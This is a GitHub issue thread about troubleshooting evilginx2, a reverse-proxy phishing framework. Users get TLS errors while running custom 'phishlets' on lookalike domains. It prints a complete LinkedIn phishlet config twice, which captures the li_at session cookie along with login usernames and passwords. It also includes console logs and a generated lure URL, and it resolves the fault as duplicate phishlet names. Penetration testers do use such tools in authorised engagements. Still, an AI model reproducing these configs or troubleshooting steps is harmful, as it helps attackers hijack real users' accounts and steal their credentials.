Closed anicec4t closed 5 years ago
More info?
I've done some phishlets for some client and when I test them Chrome gives me ERR_SSL_PROTOCOL_ERROR In the framework console of evilginx2 there is no message like "new visitor".....
Can be because the phishlets are maybe not done right? or not complete?
What phishlets? What version? I have nothing to work with here.
evilginx version 2.0 the phishlet was created by me. it is not a phishlet already included in the framework
any clue how to check if my phishlet is done right so we can exclude that?
found out where the problem is. I will come up with a detailed view in a few minutes
Okay so the problem is when you create new yaml phishlets using pico (as I did) after you save them pico adds an extra byte to the file causing the evilginx server to ac strange.
I tested as follows: test 1: using the linkedin.yaml included in the framework - all went well test 2: cat the linkedin.yaml and copy paste the output to a file called test2.yaml - both of the files looked the same when did the cat - received the SSL error
Isn't it because you have two phishlets running with same configuration and evilginx sends a wrong cert for wrong domain? It would help if you pasted the full error.
This site can’t provide a secure connection www.testtting-domain.online sent an invalid response. ERR_SSL_PROTOCOL_ERROR
I'm sure there are more details to this error if you look carefully.
this is the full error tests were done using same linkedin phishlet also before activating the phishlet I did the phishlet disable name command
Nope. that is the only error chrome does no show more or details :(
Firefox gives: Secure Connection Failed
An error occurred during a connection to www.handler-mobile.online. SSL received a record that exceeded the maximum permissible length. Error code: SSL_ERROR_RX_RECORD_TOO_LONG
The page you are trying to view cannot be shown because the authenticity of the received data could not be verified.
Please contact the website owners to inform them of this problem.
Output of evil.. [12:41:19] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online] : phishlets hostname sure handler-mobile.online [12:41:33] [inf] phishlet 'sure' hostname set to: handler-mobile.online [12:41:33] [inf] disabled phishlet 'sure' : phishlets enable sure [12:41:33] [inf] enabled phishlet 'sure' [12:41:33] [inf] setting up certificates for phishlet 'sure'... [12:41:33] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online] : phishlets get-url sure https://google.com/
If you have the sub_filters: not complete can that cause the error?
So you say that example phishlets work fine, but just not the one you made yourself? Phishlets validation is coming in version 2.2, which is few weeks away.
This one used now is a copy paste of the included one of linkedin
what I was asking was. If I create a phishlet for x web site and for some reason I don't make it complete (let's say I don't add action= ..) can this be the cause of that error, in the case that the YAML file is written sintax right.
cbc8b6f0dd29a53c5487449d9501f540 linkedin.yaml cbc8b6f0dd29a53c5487449d9501f540 sure.yaml
linkedin.yaml
name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
- {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true}
sub_filters:
- {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
- {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
- {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: '//{hostname}/nhome/', replace: '//{hostname}/nhome/', mimes: ['text/html', 'application/json']}
auth_tokens:
- domain: 'www.linkedin.com'
keys: ['li_at']
user_regex:
key: 'session_key'
re: '(.*)'
pass_regex:
key: 'session_password'
re: '(.*)'
landing_path:
- '/uas/login'
sure.yaml
name: 'linkedin'
author: '@mrgretzky'
min_ver: '2.0.0'
proxy_hosts:
- {phish_sub: 'www', orig_sub: 'www', domain: 'linkedin.com', session: true, is_landing: true}
sub_filters:
- {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'action="https://{hostname}', replace: 'action="https://{hostname}', mimes: ['text/html', 'application/json']}
- {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: 'href="https://{hostname}', replace: 'href="https://{hostname}', mimes: ['text/html', 'application/json']}
- {hostname: 'www.linkedin.com', sub: 'www', domain: 'linkedin.com', search: '//{hostname}/nhome/', replace: '//{hostname}/nhome/', mimes: ['text/html', 'application/json']}
auth_tokens:
- domain: 'www.linkedin.com'
keys: ['li_at']
user_regex:
key: 'session_key'
re: '(.*)'
pass_regex:
key: 'session_password'
re: '(.*)'
landing_path:
- '/uas/login'
[12:58:03] [inf] setting up certificates for phishlet 'sure'... [12:58:03] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online] : phishlets hostname sure handler-mobile.online [12:58:10] [inf] phishlet 'sure' hostname set to: handler-mobile.online [12:58:10] [inf] disabled phishlet 'sure' : phishlets enable sure [12:58:10] [inf] enabled phishlet 'sure' [12:58:10] [inf] setting up certificates for phishlet 'sure'... [12:58:10] [+++] successfully set up SSL/TLS certificates for domains: [www.handler-mobile.online] : phishlets get-url sure https://google.com/
https://www.handler-mobile.online/uas/login?yf=5dc0&ns=aHR0cHM6Ly9nb29nbGUuY29tLw%3D%3D
same error Chrome: This site can’t provide a secure connection www.handler-mobile.online sent an invalid response. ERR_SSL_PROTOCOL_ERROR
What phishlets do you have enabled when this error appears?
hi, i used the linkedin one
Hey i'm getting this error also with a custom phishlet i have been working on. I did a PCAP on my test machine and my evilginx server; it looks like the evilginx server is sending a 502 bad gateway response when the client sends the TLS Client Hello.
The issue appears on Chrome/Firefox on Mac/Windows hosts.
My evilginx is running on Ubuntu 18.04.1
Nothing is printed in debug log, and the issues happens in normal mode as well as developer mode.
My phishlet is the only one enabled.
This is causing some head scratches between me and a few friends who have tried troubleshooting.
I would be happy to share my phishlet with you via PM or email, or any other information which can be helpful to you. It's possible the issue is in my phishlet; it's the first one I've written.
EDIT: Alright, looks like i solved this one right after posting. I love it when that happens! I was testing a few variations of my phishlet, each of them had the same name. As soon as I changed the phishlet name, it started working. Duplicate phishlet names=bad
so what you are saying is that if a phishlet is not done right and has the name "aaa" if you edit it and reload evilginx, it will give you same error. so you have to rename it after edit to aaa1 right?
@kafkaesqu3 Glad to hear that fixed it :)
Version 2.2.0 is adding a lot of phishlet validation, but it seems I need to also add a check for duplicate phishlet names. Thanks.
I think it is wiser to just remove the name
variable from phishlet file format and instead rely on the name of the filename without .yaml
extension. Filenames will provide the uniqueness which is required and will decrease the confusion, making it all less error prone for phishlet creators.
Too easy to make this mistake now.
The phish link is responding with "ERR_SSL_PROTOCOL_ERROR" in chrome for different web sites... any clues?